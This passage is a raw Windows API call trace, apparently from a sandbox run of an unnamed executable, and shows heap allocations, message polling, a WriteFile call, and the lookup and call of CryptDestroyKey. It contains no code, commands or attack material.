lpMsg=0x8cf708) returned 0 [0153.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0153.850] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14108) returned 0x2f14010 [0153.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.853] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x14108, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x14108, lpOverlapped=0x0) returned 1 [0153.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0153.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0153.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0153.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0153.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.857] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0153.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0153.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0153.857] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0153.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.858] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.858] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0153.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50740, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.860] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0153.861] CryptDestroyKey (hKey=0xa87250) returned 1 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0153.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0153.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.862] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.862] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.863] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.864] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.864] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0153.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.864] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0153.865] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.865] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0153.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0153.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.866] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0153.866] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 